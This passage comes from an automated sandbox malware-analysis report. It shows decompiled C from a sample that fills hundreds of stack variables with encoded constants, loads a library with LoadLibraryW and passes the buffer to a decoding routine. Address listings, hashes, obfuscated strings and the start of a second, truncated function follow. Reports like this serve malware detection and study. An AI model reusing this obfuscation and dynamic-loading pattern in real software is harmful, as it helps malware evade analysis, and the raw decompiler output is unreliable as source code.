				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				char _v1560;
				struct HINSTANCE__* _t392;

				_v1560 = 0x4befb69c;
				_v1556 = 0xe2a7d93;
				_v1552 = 0xec58315b;
				_v1548 = 0xf479b9e5;
				_v1544 = 0x3655e0b3;
				_v1540 = 0x1788529f;
				_v1536 = 0xf8a87d29;
				_v1532 = 0x6a1c103e;
				_v1528 = 0xa3a4c637;
				_v1524 = 0xdd4d869a;
				_v1520 = 0xda58f7da;
				_v1516 = 0xa4aa4a18;
				_v1512 = 0xf64937e7;
				_v1508 = 0xa4ae6a93;
				_v1504 = 0x4a93dd70;
				_v1500 = 0x15b491d3;
				_v1496 = 0xb70e4dcf;
				_v1492 = 0xfb7fcaa2;
				_v1488 = 0x5ce8c08f;
				_v1484 = 0x83c7a18c;
				_v1480 = 0x6c649979;
				_v1476 = 0x8a267553;
				_v1472 = 0x14352803;
				_v1468 = 0xf6f6795d;
				_v1464 = 0xcc94b246;
				_v1460 = 0xbe9f1468;
				_v1456 = 0x3ef68f3a;
				_v1452 = 0x8360e0ee;
				_v1448 = 0xdd8b73c8;
				_v1444 = 0xfc9700e;
				_v1440 = 0x718d1c8;
				_v1436 = 0xffb7254;
				_v1432 = 0x286ed90a;
				_v1428 = 0x1b23db2c;
				_v1424 = 0xda2233ed;
				_v1420 = 0xbc53fd27;
				_v1416 = 0xde98ddd2;
				_v1412 = 0xb4314b61;
				_v1408 = 0xea162a4;
				_v1404 = 0xc02a9ba2;
				_v1400 = 0x967ce52;
				_v1396 = 0xabfbe251;
				_v1392 = 0x175cb512;
				_v1388 = 0xf8447fac;
				_v1384 = 0x2eac2eac;
				_v1380 = 0xf4344c6a;
				_v1376 = 0xbbdcaee3;
				_v1372 = 0xe99636da;
				_v1368 = 0x13a7e5e1;
				_v1364 = 0xff3c9bed;
				_v1360 = 0x8dbfbd40;
				_v1356 = 0xb185ff34;
				_v1352 = 0xcace94c2;
				_v1348 = 0xc80d6527;
				_v1344 = 0xa606e2ad;
				_v1340 = 0x6ae37e45;
				_v1336 = 0x282fa05a;
				_v1332 = 0x88a6d551;
				_v1328 = 0x1ff98e41;
				_v1324 = 0x5afaf771;
				_v1320 = 0xebf0ac61;
				_v1316 = 0x51130de3;
				_v1312 = 0xa1336917;
				_v1308 = 0x7a2f88ee;
				_v1304 = 0x718b7c64;
				_v1300 = 0xf2ab104c;
				_v1296 = 0xb1a7a998;
				_v1292 = 0x268c77d7;
				_v1288 = 0x9a6fd234;
				_v1284 = 0x60166448;
				_v1280 = 0xe602cf3d;
				_v1276 = 0x71c5ac19;
				_v1272 = 0xd33a43b2;
				_v1268 = 0x27eb747f;
				_v1264 = 0x1470ea9a;
				_v1260 = 0xa144ffe1;
				_v1256 = 0xd6d9720b;
				_v1252 = 0x9286eb36;
				_v1248 = 0x2aefe3bd;
				_v1244 = 0xed564a2f;
				_v1240 = 0xa9426475;
				_v1236 = 0x2bf8a593;
				_v1232 = 0xd0a447e5;
				_v1228 = 0x48052515;
				_v1224 = 0x3e8ebb64;
				_v1220 = 0xfe618b29;
				_v1216 = 0x751b8d9a;
				_v1212 = 0xd44d92f4;
				_v1208 = 0x5d775a9c;
				_v1204 = 0x62856083;
				_v1200 = 0xf5056c81;
				_v1196 = 0x29043594;
				_v1192 = 0x4ba08155;
				_v1188 = 0x2b9a15db;
				_v1184 = 0x15929201;
				_v1180 = 0x3631bff8;
				_v1176 = 0x959afeae;
				_v1172 = 0x1b996608;
				_v1168 = 0x9f6b0905;
				_v1164 = 0x6541544e;
				_v1160 = 0x3b4276c2;
				_v1156 = 0x449b5732;
				_v1152 = 0xeeda9290;
				_v1148 = 0xdcaa8116;
				_v1144 = 0xa1baec1f;
				_v1140 = 0x1470c0f3;
				_v1136 = 0x3e6a5a1a;
				_v1132 = 0x3833bb5d;
				_v1128 = 0xdb45c3d4;
				_v1124 = 0x27574c46;
				_v1120 = 0xa80b0835;
				_v1116 = 0xfcd6c910;
				_v1112 = 0xe990762e;
				_v1108 = 0xe0d8e335;
				_v1104 = 0x34abe755;
				_v1100 = 0x56597a74;
				_v1096 = 0xb103ce43;
				_v1092 = 0xef319e25;
				_v1088 = 0x22a91b8d;
				_v1084 = 0xf82edbd2;
				_v1080 = 0x3b4b8d37;
				_v1076 = 0x338cfe68;
				_v1072 = 0xf29573ff;
				_v1068 = 0x563e81d6;
				_v1064 = 0x548c86c1;
				_v1060 = 0x4468b232;
				_v1056 = 0xede258c9;
				_v1052 = 0x7c8c7e70;
				_v1048 = 0xd17a549a;
				_v1044 = 0xaf47054c;
				_v1040 = 0x8e7aa5fb;
				_v1036 = 0xda162cad;
				_v1032 = 0x7f4adfe2;
				_v1028 = 0xb42a2fff;
				_v1024 = 0x7179f28c;
				_v1020 = 0xcf51a6c7;
				_v1016 = 0xb6332844;
				_v1012 = 0xfdcdaa4c;
				_v1008 = 0xb14c459d;
				_v1004 = 0x7564d49e;
				_v1000 = 0x8f70fe3c;
				_v996 = 0xdc36cd7d;
				_v992 = 0x63e63e71;
				_v988 = 0x5edb739d;
				_v984 = 0x1cd504ef;
				_v980 = 0x93b57070;
				_v976 = 0x28a54980;
				_v972 = 0x64ef1114;
				_v968 = 0xed02e6be;
				_v964 = 0xabe7464c;
				_v960 = 0xe34a9f4f;
				_v956 = 0x38e0f1e6;
				_v952 = 0xec04582b;
				_v948 = 0x61693d0f;
				_v944 = 0xe21a0b35;
				_v940 = 0xc48c0b6a;
				_v936 = 0xfc0bfcd2;
				_v932 = 0xe781bd04;
				_v928 = 0x148c9f07;
				_v924 = 0x29cccea2;
				_v920 = 0xae046087;
				_v916 = 0x170e2607;
				_v912 = 0xfb9e28d9;
				_v908 = 0xc5f3c745;
				_v904 = 0x2064696d;
				_v900 = 0xfffefc0b;
				_v896 = 0xf75d58e6;
				_v892 = 0xdd0c0350;
				_v888 = 0xee345fd5;
				_v884 = 0x15c0bc71;
				_v880 = 0xfc21594b;
				_v876 = 0xf7d17b82;
				_v872 = 0xc53fb9bc;
				_v868 = 0x3db78dd2;
				_v864 = 0x5aa3eff4;
				_v860 = 0x4ffb8986;
				_v856 = 0x679dc3d7;
				_v852 = 0xf57679b7;
				_v848 = 0xd4a33e35;
				_v844 = 0x17525c45;
				_v840 = 0x2f705952;
				_v836 = 0x4709a022;
				_v832 = 0xe1344555;
				_v828 = 0xd80a835f;
				_v824 = 0x615f5253;
				_v820 = 0x5433de81;
				_v816 = 0x54f130f8;
				_v812 = 0x4823fa93;
				_v808 = 0xb927d63b;
				_v804 = 0xa075442;
				_v800 = 0xf027a5bf;
				_v796 = 0x1ff6d87a;
				_v792 = 0x717d95e8;
				_v788 = 0xc7adf187;
				_v784 = 0x41178485;
				_v780 = 0xd28e7ea8;
				_v776 = 0xd30c5935;
				_v772 = 0x323cce37;
				_v768 = 0x3b66b84b;
				_v764 = 0x93a4a480;
				_v760 = 0xc6f91e4c;
				_v756 = 0x878d3e1c;
				_v752 = 0xacbe73e0;
				_v748 = 0x39411ffd;
				_v744 = 0x51956353;
				_v740 = 0xeae86d79;
				_v736 = 0x74761c39;
				_v732 = 0x61d7b190;
				_v728 = 0xa072a497;
				_v724 = 0x958dee7a;
				_v720 = 0x9e671c60;
				_v716 = 0xd2430678;
				_v712 = 0x94c08196;
				_v708 = 0x965ab2f9;
				_v704 = 0x29b1888a;
				_v700 = 0x32e7db29;
				_v696 = 0xc7764655;
				_v692 = 0x6f1caa55;
				_v688 = 0x9eb0d2f;
				_v684 = 0x880161c9;
				_v680 = 0xa1c00ce3;
				_v676 = 0xc1d28a66;
				_v672 = 0xcc72ca45;
				_v668 = 0x97b55c25;
				_v664 = 0x8558f7e3;
				_v660 = 0x8ac5a732;
				_v656 = 0x6245af98;
				_v652 = 0xabcc6957;
				_v648 = 0x7e544f4d;
				_v644 = 0x43da5efa;
				_v640 = 0x781609ef;
				_v636 = 0x4617ba68;
				_v632 = 0xdfef7616;
				_v628 = 0x999614b7;
				_v624 = 0xb1861e95;
				_v620 = 0xe7f3ecef;
				_v616 = 0x74d5be3b;
				_v612 = 0x3fc5e28;
				_v608 = 0x1dd16ad;
				_v604 = 0x1052e4f9;
				_v600 = 0x65c2038a;
				_v596 = 0xd0c421c0;
				_v592 = 0xbc4682ff;
				_v588 = 0x32e7b9aa;
				_v584 = 0xd10fbd07;
				_v580 = 0xedbcb66b;
				_v576 = 0x2000143;
				_v572 = 0xcb14edfd;
				_v568 = 0xcf05854d;
				_v564 = 0xa88f0fe2;
				_v560 = 0xb803256e;
				_v556 = 0xb644a825;
				_v552 = 0xeeba0c9d;
				_v548 = 0x388db315;
				_v544 = 0x76b2629a;
				_v540 = 0xf626cd97;
				_v536 = 0x5ffbfc65;
				_v532 = 0x63532dab;
				_v528 = 0xc99a8036;
				_v524 = 0x3db019be;
				_v520 = 0xb8a25e3b;
				_v516 = 0x27c55253;
				_v512 = 0x64213913;
				_v508 = 0x1fc02174;
				_v504 = 0x74194bd1;
				_v500 = 0xc2830dba;
				_v496 = 0x59201bb3;
				_v492 = 0xf0a50b26;
				_v488 = 0x30a58ab3;
				_v484 = 0xe5059002;
				_v480 = 0xf326a3d3;
				_v476 = 0x98f99278;
				_v472 = 0xe9d966bc;
				_v468 = 0xab4cde5d;
				_v464 = 0x808fb1a1;
				_v460 = 0xd56d9e3e;
				_v456 = 0x4fc3d42f;
				_v452 = 0xe97c9080;
				_v448 = 0x5fec54a8;
				_v444 = 0x554cc6e2;
				_v440 = 0x7ae3fc51;
				_v436 = 0x3db9e987;
				_v432 = 0x270657d8;
				_v428 = 0x91df6386;
				_v424 = 0xa06420f6;
				_v420 = 0xb645fca2;
				_v416 = 0x9c6867fb;
				_v412 = 0x519fe36b;
				_v408 = 0xb7531c61;
				_v404 = 0xf5fc84f3;
				_v400 = 0x26cd3d1f;
				_v396 = 0x472b53f7;
				_v392 = 0xf96b6641;
				_v388 = 0xabeb68fc;
				_v384 = 0xeff2f92;
				_v380 = 0x12bd2dda;
				_v376 = 0xad0b7b64;
				_v372 = 0x1ba50940;
				_v368 = 0xd9508423;
				_v364 = 0x5b6a112d;
				_v360 = 0x4c072a9e;
				_v356 = 0xcd632d88;
				_v352 = 0x86676816;
				_v348 = 0x11d5ce75;
				_v344 = 0x4d839846;
				_v340 = 0x61a20281;
				_v336 = 0x7d4b08cc;
				_v332 = 0xe75e3c98;
				_v328 = 0xa09673de;
				_v324 = 0x4fcdca3;
				_v320 = 0x87caecd;
				_v316 = 0x8bb0de23;
				_v312 = 0x8bb4e855;
				_v308 = 0xd5e4f17c;
				_v304 = 0x6ce7b55c;
				_v300 = 0x2917ee1f;
				_v296 = 0xb765a1eb;
				_v292 = 0x17313737;
				_v288 = 0x491b73e5;
				_v284 = 0x60893bf9;
				_v280 = 0x8ed66181;
				_v276 = 0xd3c82709;
				_v272 = 0x74742dcc;
				_v268 = 0xb70f62bb;
				_v264 = 0x46e9044d;
				_v260 = 0xddfb36c2;
				_v256 = 0x1c14621e;
				_v252 = 0x3bba477e;
				_v248 = 0x1f5f3936;
				_v244 = 0xb8113197;
				_v240 = 0x1a909f95;
				_v236 = 0x2ff6f937;
				_v232 = 0x906b0598;
				_v228 = 0xeb5ff201;
				_v224 = 0x6f534f00;
				_v220 = 0x396a258d;
				_v216 = 0xdc74f9cd;
				_v212 = 0x9606240;
				_v208 = 0xeece9328;
				_v204 = 0x98343d05;
				_v200 = 0x46089577;
				_v196 = 0x8ca5a500;
				_v192 = 0x5fa8daa2;
				_v188 = 0xfebc41a3;
				_v184 = 0x4f16be69;
				_v180 = 0x5fcd3ff2;
				_v176 = 0x290cab8a;
				_v172 = 0x9084f10f;
				_v168 = 0x21f4372d;
				_v164 = 0xf77c0e4f;
				_v160 = 0xee8b3883;
				_v156 = 0x9d87c954;
				_v152 = 0xb5dc9ad1;
				_v148 = 0x31d7efed;
				_v144 = 0x23271e7d;
				_v140 = 0x2030c0b1;
				_v136 = 0x89cc42fd;
				_v132 = 0x855c1fdb;
				_v128 = 0x4586f4e2;
				_v124 = 0x6c1867c5;
				_v120 = 0x2b50d8a6;
				_v116 = 0xd392eb31;
				_v112 = 0x5adcea22;
				_v108 = 0xb0c01b07;
				_v104 = 0xfc9581f8;
				_v100 = 0x8a3c0db7;
				_v96 = 0xf184c207;
				_v92 = 0xf7612506;
				_v88 = 0xc77cedd3;
				_v84 = 0x456eed47;
				_v80 = 0x4d7c6473;
				_v76 = 0xf66fe5bc;
				_v72 = 0x3b81c48e;
				_v68 = 0x4ca88e47;
				_v64 = 0xf1f7108e;
				_v60 = 0xb6ad32aa;
				_v56 = 0xa746cf25;
				_v52 = 0x76783488;
				_v48 = 0x8a52240d;
				_v44 = 0xf4ff14a7;
				_v40 = 0xf0d384e;
				_v36 = 0x88b9944;
				_v32 = 0x8289fea5;
				_v28 = 0xf70587d8;
				_v24 = 0xecf5125b;
				_v20 = 0x4b2bcabe;
				_v16 = 0x645459e0;
				_v12 = 0x8f09d154;
				_v8 = 0x7a530fa7;
				_t400 = E00401A52(0x412980, 0x72fc3a35);
				_t392 = LoadLibraryW(_t391); // executed
				 *0x4164f4 = _t392;
				L00401B09(_t400);
				_push(0x414e70);
				_push(0x4fb37d17);
				return E004012FF( *0x4164f4,  &_v1560, 0x185);
			}









































































































































































































































































































































































































                  0x00408cdf
                  0x00408ce9
                  0x00408cf3
                  0x00408cfd
                  0x00408d07
                  0x00408d11
                  0x00408d1b
                  0x00408d25
                  0x00408d2f
                  0x00408d39
                  0x00408d43
                  0x00408d4d
                  0x00408d57
                  0x00408d61
                  0x00408d6b
                  0x00408d75
                  0x00408d7f
                  0x00408d89
                  0x00408d93
                  0x00408d9d
                  0x00408da7
                  0x00408db1
                  0x00408dbb
                  0x00408dc5
                  0x00408dcf
                  0x00408dd9
                  0x00408de3
                  0x00408ded
                  0x00408df7
                  0x00408e01
                  0x00408e0b
                  0x00408e15
                  0x00408e1f
                  0x00408e29
                  0x00408e33
                  0x00408e3d
                  0x00408e47
                  0x00408e51
                  0x00408e5b
                  0x00408e65
                  0x00408e6f
                  0x00408e79
                  0x00408e83
                  0x00408e8d
                  0x00408e97
                  0x00408ea1
                  0x00408eab
                  0x00408eb5
                  0x00408ebf
                  0x00408ec9
                  0x00408ed3
                  0x00408edd
                  0x00408ee7
                  0x00408ef1
                  0x00408efb
                  0x00408f05
                  0x00408f0f
                  0x00408f19
                  0x00408f23
                  0x00408f2d
                  0x00408f37
                  0x00408f41
                  0x00408f4b
                  0x00408f55
                  0x00408f5f
                  0x00408f69
                  0x00408f73
                  0x00408f7d
                  0x00408f87
                  0x00408f91
                  0x00408f9b
                  0x00408fa5
                  0x00408faf
                  0x00408fb9
                  0x00408fc3
                  0x00408fcd
                  0x00408fd7
                  0x00408fe1
                  0x00408feb
                  0x00408ff5
                  0x00408fff
                  0x00409009
                  0x00409013
                  0x0040901d
                  0x00409027
                  0x00409031
                  0x0040903b
                  0x00409045
                  0x0040904f
                  0x00409059
                  0x00409063
                  0x0040906d
                  0x00409077
                  0x00409081
                  0x0040908b
                  0x00409095
                  0x0040909f
                  0x004090a9
                  0x004090b3
                  0x004090bd
                  0x004090c7
                  0x004090d1
                  0x004090db
                  0x004090e5
                  0x004090ef
                  0x004090f9
                  0x00409103
                  0x0040910d
                  0x00409117
                  0x00409121
                  0x0040912b
                  0x00409135
                  0x0040913f
                  0x00409149
                  0x00409153
                  0x0040915d
                  0x00409167
                  0x00409171
                  0x0040917b
                  0x00409185
                  0x0040918f
                  0x00409199
                  0x004091a3
                  0x004091ad
                  0x004091b7
                  0x004091c1
                  0x004091cb
                  0x004091d5
                  0x004091df
                  0x004091e9
                  0x004091f3
                  0x004091fd
                  0x00409207
                  0x00409211
                  0x0040921b
                  0x00409225
                  0x0040922f
                  0x00409239
                  0x00409243
                  0x0040924d
                  0x00409257
                  0x00409261
                  0x0040926b
                  0x00409275
                  0x0040927f
                  0x00409289
                  0x00409293
                  0x0040929d
                  0x004092a7
                  0x004092b1
                  0x004092bb
                  0x004092c5
                  0x004092cf
                  0x004092d9
                  0x004092e3
                  0x004092ed
                  0x004092f7
                  0x00409301
                  0x0040930b
                  0x00409315
                  0x0040931f
                  0x00409329
                  0x00409333
                  0x0040933d
                  0x00409347
                  0x00409351
                  0x0040935b
                  0x00409365
                  0x0040936f
                  0x00409379
                  0x00409383
                  0x0040938d
                  0x00409397
                  0x004093a1
                  0x004093ab
                  0x004093b5
                  0x004093bf
                  0x004093c9
                  0x004093d3
                  0x004093dd
                  0x004093e7
                  0x004093f1
                  0x004093fb
                  0x00409405
                  0x0040940f
                  0x00409419
                  0x00409423
                  0x0040942d
                  0x00409437
                  0x00409441
                  0x0040944b
                  0x00409455
                  0x0040945f
                  0x00409469
                  0x00409473
                  0x0040947d
                  0x00409487
                  0x00409491
                  0x0040949b
                  0x004094a5
                  0x004094af
                  0x004094b9
                  0x004094c3
                  0x004094cd
                  0x004094d7
                  0x004094e1
                  0x004094eb
                  0x004094f5
                  0x004094ff
                  0x00409509
                  0x00409513
                  0x0040951d
                  0x00409527
                  0x00409531
                  0x0040953b
                  0x00409545
                  0x0040954f
                  0x00409559
                  0x00409563
                  0x0040956d
                  0x00409577
                  0x00409581
                  0x0040958b
                  0x00409595
                  0x0040959f
                  0x004095a9
                  0x004095b3
                  0x004095bd
                  0x004095c7
                  0x004095d1
                  0x004095db
                  0x004095e5
                  0x004095ef
                  0x004095f9
                  0x00409603
                  0x0040960d
                  0x00409617
                  0x00409621
                  0x0040962b
                  0x00409635
                  0x0040963f
                  0x00409649
                  0x00409653
                  0x0040965d
                  0x00409667
                  0x00409671
                  0x0040967b
                  0x00409685
                  0x0040968f
                  0x00409699
                  0x004096a3
                  0x004096ad
                  0x004096b7
                  0x004096c1
                  0x004096cb
                  0x004096d5
                  0x004096df
                  0x004096e9
                  0x004096f3
                  0x004096fd
                  0x00409707
                  0x00409711
                  0x0040971b
                  0x00409725
                  0x0040972f
                  0x00409739
                  0x00409743
                  0x0040974d
                  0x00409757
                  0x00409761
                  0x0040976b
                  0x00409775
                  0x0040977f
                  0x00409789
                  0x00409793
                  0x0040979d
                  0x004097a7
                  0x004097b1
                  0x004097bb
                  0x004097c5
                  0x004097cf
                  0x004097d9
                  0x004097e3
                  0x004097ed
                  0x004097f7
                  0x00409801
                  0x0040980b
                  0x00409815
                  0x0040981f
                  0x00409829
                  0x00409833
                  0x0040983d
                  0x00409847
                  0x00409851
                  0x0040985b
                  0x00409865
                  0x0040986f
                  0x00409879
                  0x00409883
                  0x0040988d
                  0x00409897
                  0x004098a1
                  0x004098ab
                  0x004098b5
                  0x004098bf
                  0x004098c9
                  0x004098d3
                  0x004098dd
                  0x004098e7
                  0x004098f1
                  0x004098fb
                  0x00409905
                  0x0040990f
                  0x00409919
                  0x00409923
                  0x0040992d
                  0x00409937
                  0x00409941
                  0x0040994b
                  0x00409955
                  0x0040995f
                  0x00409969
                  0x00409973
                  0x00409982
                  0x00409991
                  0x0040999b
                  0x004099a5
                  0x004099af
                  0x004099b9
                  0x004099c3
                  0x004099cd
                  0x004099d7
                  0x004099e1
                  0x004099eb
                  0x004099f5
                  0x004099ff
                  0x00409a09
                  0x00409a13
                  0x00409a1d
                  0x00409a27
                  0x00409a31
                  0x00409a3b
                  0x00409a45
                  0x00409a4f
                  0x00409a59
                  0x00409a63
                  0x00409a6d
                  0x00409a77
                  0x00409a81
                  0x00409a8b
                  0x00409a95
                  0x00409a9f
                  0x00409aa9
                  0x00409ab3
                  0x00409abd
                  0x00409ac7
                  0x00409ad1
                  0x00409adb
                  0x00409ae2
                  0x00409ae9
                  0x00409af0
                  0x00409af7
                  0x00409afe
                  0x00409b05
                  0x00409b0c
                  0x00409b13
                  0x00409b1a
                  0x00409b21
                  0x00409b28
                  0x00409b2f
                  0x00409b36
                  0x00409b3d
                  0x00409b44
                  0x00409b4b
                  0x00409b52
                  0x00409b59
                  0x00409b60
                  0x00409b67
                  0x00409b6e
                  0x00409b75
                  0x00409b7c
                  0x00409b83
                  0x00409b8a
                  0x00409b91
                  0x00409b98
                  0x00409b9f
                  0x00409ba6
                  0x00409bad
                  0x00409bb4
                  0x00409bc0
                  0x00409bc3
                  0x00409bcb
                  0x00409bd0
                  0x00409be1
                  0x00409be6
                  0x00409bfc

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040B6B5, Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 380libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
